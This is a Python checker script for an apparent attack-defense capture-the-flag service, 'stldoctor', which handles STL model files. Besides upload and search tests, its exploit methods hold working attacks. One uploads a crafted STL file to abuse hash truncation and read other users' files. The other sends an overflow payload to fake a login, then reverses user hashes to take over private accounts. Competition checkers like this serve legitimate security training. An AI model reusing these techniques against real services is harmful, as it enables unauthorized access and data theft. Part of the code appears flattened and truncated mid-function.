#!/usr/bin/env python3 from enochecker import BaseChecker, BrokenServiceException, EnoException, run from enochecker.utils import SimpleSocket, assert_equals, assert_in import math, os, random, string, struct, subprocess, logging, selectors, time, socket import numpy as np logging.getLogger("faker").setLevel(logging.WARNING) logging.getLogger("pwnlib").setLevel(logging.WARNING) logging.getLogger("_curses").setLevel(logging.CRITICAL) rand = random.SystemRandom() from faker import Faker evil_file = b""" solid test\xff facet normal 0 0 1.0 outer loop vertex 1 0 0 vertex 1 1 0 vertex 0 1 0 endloop endfacet endsolid test\xff """ generic_alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789-+.!" def ensure_bytes(v): if type(v) == bytes: return v elif type(v) == str: return v.encode() else: raise BrokenServiceException("Tried to pass non str/bytes to bytes arg") def includes_all(resp, targets): for m in targets: if ensure_bytes(m) not in resp: return False return True def includes_any(resp, targets): for m in targets: if ensure_bytes(m) in resp: return True return False def fakeid(): fake = Faker(["en_US"]) idstr = bytes([ord(c) for c in fake.name().replace(" ","") if c in generic_alphabet][:12]).ljust(10, b".") idstr += bytes([ord(rand.choice(generic_alphabet)) for i in range(8)]) return idstr def havocid(): idlen = rand.randint(10, 40) return bytes([rand.randint(32, 127) for i in range(idlen)]) def reverse_hash(hashstr): if type(hashstr) is bytes: hashstr = hashstr.decode() data = subprocess.check_output([os.getenv("REVHASH_PATH"), hashstr])[:-1] if data == b"": raise BrokenServiceException(f"Failed to find hash preimage of {hashstr}") return data def check_line(conn, context): line = conn.recvline() if b"ERR:" in line: raise BrokenServiceException(f"{context}: Unexpected error message\n") return line def parse_int(intstr): try: return int(intstr) except: return None class STLDoctorChecker(BaseChecker): service_name = "stldoctor" port = 9090 flag_variants = 2 noise_variants = 2 havoc_variants = 16 exploit_variants = 2 prompt = b"\r$ " # HELPER FUNCS # def querydb(self, *args): vals = [] for arg in args: try: val: str = self.chain_db[arg] except KeyError as ex: raise BrokenServiceException(f"Invalid db contents, missing: {arg}") vals.append(val) return vals def postdb(self, **kwdict): self.chain_db = kwdict def genfile_ascii(self, solidname, malformed = None): indent = bytes([rand.choice(b"\t ") for i in range(rand.randint(1, 4))]) solidname = ensure_bytes(solidname) facet_count = rand.randint(4, 30) if len(solidname) != 0: content = b"solid " + solidname + b"\n" else: content = b"solid\n" for fi in range(facet_count): # MALFORM 1: wrong keyword if malformed == 1: content += indent * 1 + b"facet nornal " else: content += indent * 1 + b"facet normal " vs = [[rand.random() for i in range(3)] for k in range(3)] norm = np.cross(np.subtract(vs[1], vs[0]), np.subtract(vs[2],vs[0])) norm = norm / np.linalg.norm(norm) content += " ".join([f"{v:.2f}" for v in norm]).encode() + b"\n" # MALFORM 2: wrong keyword case if malformed == 2: content += indent * 2 + b"outer lOop\n" else: content += indent * 2 + b"outer loop\n" for i in range(3): content += indent * 3 + b"vertex " + " ".join([f"{v:.2f}" for v in vs[i]]).encode() + b"\n" content += indent * 2 + b"endloop\n" content += indent + b"endfacet\n" # MALFORM 3: no endsolid keyword if malformed != 3: if solidname != b"": content += b"endsolid " + solidname + b"\n" else: content += b"endsolid\n" return content def genfile_bin(self, solidname, malformed = None): solidname = ensure_bytes(solidname) facet_count = rand.randint(4, 30) if len(solidname) > 78: raise EnoException("Solidname to embed in header is larger than header itself") if solidname != "": content = b"#" + solidname.ljust(78, b"\x00") + b"\x00" else: content = b"#" + b"\x00" * 79 # MALFORM 1: specify more facets than are in the file if malformed == 1: content += struct.pack("> " not in resp: if check: raise BrokenServiceException(f"Failed to list private files:\n{resp}") return None return resp def do_upload(self, conn, modelname, stlfile, check = True): modelname = ensure_bytes(modelname) # Upload file self.debug(f"Uploading model with name {modelname}") conn.write("upload\n") conn.write(modelname + b"\n") conn.write(f"{len(stlfile)}\n") conn.write(stlfile) # Check for errors _ = conn.recvline() # Modelname: line = conn.recvline() if b"ERR:" in line: if check: raise BrokenServiceException(f"Failed to upload model {modelname}:\n{line}") conn.recvuntil(self.prompt) return None # Parse ID try: modelid = line.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1] if modelid == b"": raise Exception except: raise BrokenServiceException(f"Invalid response during upload of {modelname}:\n{line}") conn.recvuntil(self.prompt) return modelid def do_search(self, conn, modelname, download = False, check = True): modelname = ensure_bytes(modelname) # Initiate download self.debug(f"Retrieving model with name {modelname}") conn.write(b"search " + modelname + b"\n") conn.write("0\n") # first result conn.write("y\n" if download else "n\n") conn.write("q\n") # quit # Check if an error occured line = conn.recvline() if b"ERR:" in line: if check: raise BrokenServiceException(f"Failed to retrieve model {modelname}:\n{line}") if b"Couldn't find a matching scan result" in line: # collect all the invalid commands sent after (hacky) conn.recvuntil(self.prompt) conn.recvuntil(self.prompt) conn.recvuntil(self.prompt) conn.recvuntil(self.prompt) return None # Recv until end of info box fileinfo = line + conn.recvuntil("================== \n") stlfile = b"" if download: # Parse file contents conn.recvuntil(b"Here you go.. (") size = parse_int(conn.recvuntil(b"B)\n")[:-3]) if size is None: raise BrokenServiceException(f"Received invalid download size, response:\n{resp}") self.debug(f"Download size: {size}") stlfile = conn.recvn(size) conn.recvuntil(self.prompt) return fileinfo, stlfile # CHECK WRAPPERS # def check_listed(self, conn, includes): resp = self.do_list(conn, check = True) if not includes_all(resp, includes): raise BrokenServiceException(f"Failed to find {includes} in listing:\n{resp}") return resp def check_not_listed(self, conn, excludes, fail = False): resp = self.do_list(conn, check = False) if fail and resp: raise BrokenServiceException(f"Expected list to fail, but returned:\n{resp}") if not fail and not resp: raise BrokenServiceException(f"List failed unexpectedly:\n{resp}") if resp and includes_any(resp, excludes): raise BrokenServiceException(f"Unexpectedly found one of {excludes} in listing:\n{resp}") return resp def check_in_search(self, conn, modelname, includes, download = False): info, stlfile = self.do_search(conn, modelname, download, check = True) if not includes_all(info + stlfile, includes): raise BrokenServiceException(f"Retrieved info for {modelname} is missing {includes}: {resp}") return info, stlfile def check_not_in_search(self, conn, modelname, excludes, download = False, fail = False): resp = self.do_search(conn, modelname, download, check = False) if resp: combined = resp[0]+resp[1] if fail and resp: raise BrokenServiceException("Search for {modelname} succeeded unexpectedly:\n{combined}") if not fail and not resp: raise BrokenServiceException(f"Search for {modelname} failed unexpectedly:\n{resp}") if resp and includes_any(resp[0] + resp[1], excludes): raise BrokenServiceException(f"Unexpectedly {modelname} info contains one of {includes}: {combined}") return resp # TEST METHODS # def test_good_upload(self, filetype, register): # ASCII Solidname cant be havocid since it might mess with parsing solidname = fakeid() if filetype == "ascii" else havocid() modelname = havocid() authstr = havocid() stlfile = self.genfile(solidname, filetype) # Create new session and user and upload file conn = self.openconn() if register: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) expected = [modelname, solidname, stlfile, modelid] resp = self.check_in_search(conn, modelname, expected, download = True) if register: resp = self.check_listed(conn, [modelname, modelid]) self.closeconn(conn) # Try getting file from a new session conn = self.openconn() if register: self.check_not_in_search(conn, modelname, expected, download = True, fail = True) self.do_auth(conn, authstr) self.check_in_search(conn, modelname, expected, download = True) self.check_listed(conn, [modelid, modelname]) else: self.check_in_search(conn, modelname, expected, download = True) self.closeconn(conn) def test_bad_upload(self, filetype, variant): stlfile = self.genfile(fakeid(), filetype, malformed = variant) conn = self.openconn() if self.do_upload(conn, fakeid(), stlfile, check = False): raise BrokenServiceException(f"Able to upload malformed file:\n{stlfile}") self.closeconn(conn) def test_search(self, registered = False): solidname = fakeid() modelname = fakeid() modelname2 = fakeid() authstr = fakeid() stlfile = self.genfile(solidname, "bin") conn = self.openconn() if registered: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.check_not_in_search(conn, modelname2, [modelname, modelid], download = True, fail = True) self.check_in_search(conn, modelname, [modelname, modelid], download = True) self.closeconn(conn) def test_list(self, registered = False): solidname = fakeid() modelname = fakeid() authstr = fakeid() authstr2 = fakeid() stlfile = self.genfile(solidname, "bin") conn = self.openconn() self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.check_listed(conn, [modelid, modelname]) self.closeconn(conn) if registered: conn = self.openconn() if self.do_auth(conn, authstr2): raise BrokenServiceException("New authstr {authstr2} has user dir") self.check_not_listed(conn, [modelid, modelname]) self.closeconn(conn) else: conn = self.openconn() self.check_not_listed(conn, [modelid, modelname], fail = True) self.closeconn(conn) # CHECKER METHODS # def putflag(self): # type: () -> None if self.variant_id in (0, 1): modelname = fakeid() types = ["ascii", "bin"] registered = (self.variant_id == 1) stlfile = self.genfile(self.flag, types[self.variant_id]) authstr = fakeid() if registered else "" conn = self.openconn() if registered: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.closeconn(conn) self.postdb(modelid = modelid, modelname = modelname, authstr = authstr) else: raise EnoException(f"Invalid putflag variant ({self.variant_id}) provided") def getflag(self): # type: () -> None if self.variant_id in (0, 1): modelid, modelname, authstr = self.querydb("modelid", "modelname", "authstr") registered = (self.variant_id == 1) conn = self.openconn() if registered: self.do_auth(conn, authstr) info, stlfile = self.do_search(conn, modelname, download = True) if self.flag.encode() not in info + stlfile: raise BrokenServiceException(f"Flag {self.flag} not found in search:\n{info}\n{stlfile}") self.closeconn(conn) else: raise EnoException(f"Invalid getflag variant ({self.variant_id}) provided") def putnoise(self): # type: () -> None if self.variant_id in (0, 1): modelname = fakeid() solidname = fakeid() types = ["bin", "ascii"] registered = (self.variant_id == 1) authstr = fakeid() if registered else "" stlfile = self.genfile(solidname, types[self.variant_id]) conn = self.openconn() if registered: self.do_auth(conn, authstr) modelid = self.do_upload(conn, modelname, stlfile) self.closeconn(conn) self.postdb(modelid = modelid, modelname = modelname, solidname = solidname, stlfile = stlfile, authstr = authstr) else: raise EnoException(f"Invalid putnoise variant ({self.variant_id}) provided") def getnoise(self): # type: () -> None if self.variant_id in (0, 1): modelid, modelname, solidname, stlfile, authstr \ = self.querydb("modelid", "modelname", "solidname", "stlfile", "authstr") registered = (self.variant_id == 1) expected = [modelname, solidname, stlfile, modelid] conn = self.openconn() if registered: self.do_auth(conn, authstr) self.check_in_search(conn, modelname, expected, download = True) self.closeconn(conn) else: raise EnoException(f"Invalid noise variant ({self.variant_id}) provided") def havoc(self): # type: () -> None if self.variant_id == 0: self.test_good_upload("ascii", False) elif self.variant_id == 1: self.test_good_upload("bin", False) elif self.variant_id == 2: self.test_good_upload("ascii", True) elif self.variant_id == 3: self.test_good_upload("bin", True) elif self.variant_id == 4: self.test_bad_upload("ascii", variant = 1) elif self.variant_id == 5: self.test_bad_upload("ascii", variant = 2) elif self.variant_id == 6: self.test_bad_upload("ascii", variant = 3) elif self.variant_id == 7: self.test_bad_upload("bin", variant = 1) elif self.variant_id == 8: self.test_bad_upload("bin", variant = 2) elif self.variant_id == 9: self.test_bad_upload("bin", variant = 3) elif self.variant_id == 10: self.test_bad_upload("garbage", variant = 1) elif self.variant_id == 11: self.test_bad_upload("garbage-tiny", variant = 1) elif self.variant_id == 12: self.test_search(False) elif self.variant_id == 13: self.test_search(True) elif self.variant_id == 14: self.test_list(False) elif self.variant_id == 15: self.test_list(True) else: raise EnoException(f"Invalid havoc variant ({self.variant_id}) provided") def exploit(self): # type: () -> None if self.variant_id == 0: modelname = fakeid() # Upload evil file for parse via search for hash truncation self.debug(f"Uploading evil file for hash truncation") conn = self.openconn() modelid = self.do_upload(conn, modelname, stlfile = evil_file) info, contents = self.do_search(conn, modelname, download = False) conn.write("search last\n") filelist = [l.strip().split(b" : ")[1] for l in conn.recvuntil("? ").split(b"\n") if b" : " in l] if len(filelist) == 0: raise BrokenServiceException("Failed to list files through search") # Use it to enumerate other files and grab contents found = None self.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist])) for i, fhash in enumerate(filelist): self.debug(f"Retrieving file {fhash} at index {i}") conn.write(f"{i}\nn\n") resp = conn.recvuntil("==================") resp += conn.recvuntil("? ") found = self.search_flag_bytes(resp) if found is not None or i == len(filelist) - 1: break # Done! conn.write("q\n") conn.recvuntil(self.prompt) self.closeconn(conn) if found is None: raise BrokenServiceException("Exploit for flagstore 1 failed") return found elif self.variant_id == 1: # Overflow loggedin variable conn = self.openconn() conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") conn.recvuntil(self.prompt) conn.write("auth\n") assert_in(b"Already logged in!", conn.recvuntil(self.prompt), "Exploit did not set 'loggedin' variable via overflow") # Get private user hashes via 'list' resp = self.do_list(conn) self.debug("List response: " + str(resp)) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] if len(users) == 0: raise BrokenServiceException("Unable to list private user hashes") self.closeconn(conn) # Login as each private user found = None for u in users: # Find preimage of user hash self.debug(f"Logging in as user with id {u}") user = reverse_hash(u) # Authenticate and check if the user is new conn = self.openconn() if not self.do_auth(conn, user): self.closeconn(conn) # We dont raise an exception, because it could be that user dir was cleaned # up just before we logged in, not necessarily because of an invalid prehash # raise EnoException(f"Reversing of hash {u} returned invalid preimage {user}") continue # List all private files of user resp = self.do_list(conn) self.closeconn(conn) # Search for flag in solid names names = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]) found = self.search_flag_bytes(names) if found is not None: break if found is None: raise BrokenServiceException("Exploit for flagstore 2 failed") return found else: raise EnoException(f"Invalid exploit variant ({self.variant_id}) provided") app = STLDoctorChecker.service # This can be used for uswgi. if __name__ == "__main__": run(STLDoctorChecker)